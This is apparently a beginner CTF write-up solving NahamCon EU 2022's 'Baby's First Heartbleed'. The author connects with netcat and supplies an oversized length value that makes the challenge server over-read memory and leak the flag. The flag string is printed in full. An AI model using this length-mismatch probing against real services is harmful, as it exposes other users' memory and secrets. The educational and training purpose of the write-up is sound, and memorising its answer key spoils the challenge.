Baby’s First Heartbleed

Overview

• Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆

• Challenge difficulty: Easy

Background

Author: @JohnHammond#6971

Hey kids!! Wanna learn how to hack??!?! Start here to foster your curiosity!

Press the Start button on the top-right to begin this challenge.

Connect with:
nc challenge.nahamcon.com 31305

Find The Flag

Let’s use nc(Netcat) to connect to the docker instance!

┌──(root🌸siunam)-[~/ctf/NahamCon-EU-CTF-2022/Warmups/Baby's-First-Heartbleed]
└─# nc challenge.nahamcon.com 31305


===============================================================================
     _   _ _____    _    ____ _____ ____  _     _____ _____ ____  
    | | | | ____|  / \  |  _ \_   _| __ )| |   | ____| ____|  _ \ 
    | |_| |  _|   / _ \ | |_) || | |  _ \| |   |  _| |  _| | | | |
    |  _  | |___ / ___ \|  _ < | | | |_) | |___| |___| |___| |_| |
    |_| |_|_____/_/   \_\_| \_\|_| |____/|_____|_____|_____|____/ 
                                                                      
===============================================================================

THANK YOU FOR CONNECTING TO THE SERVER. . .

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: 

Hmm… Let’s type apple:

STRING ['apple']: apple
LENGTH ['5']: 

The length of '5' is 1, we can use python3 to verify that:

┌──(root🌸siunam)-[~/ctf/NahamCon-EU-CTF-2022/Warmups/Baby's-First-Heartbleed]
└─# python3
[...]
>>> len('5')
1

LENGTH ['5']: 1

... THE SERVER RETURNED:

a

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: 

Wait what??

Umm… What if I typed the length more than 5?

Let’s try again:

STRING ['apple']: apple
LENGTH ['5']: 10

... THE SERVER RETURNED:

apple@appl

Hmm… Looks like the STRING ['apple'] is useless, and we can leak something interesting in LENGTH ['x']!

How about we type 1337 in the length?

STRING ['apple']: 
LENGTH ['5']: 1337

... THE SERVER RETURNED:

apple@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@apple@00@00@apple@00@apple@00@apple@00@apple@00@flag{bfca3d71260e581ba366dca054f5c8e5}@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00

Oh!! We leaked the flag!

• Flag: flag{bfca3d71260e581ba366dca054f5c8e5}

Conclusion

What we’ve learned:

1. Leaking The Flag via No Input Validation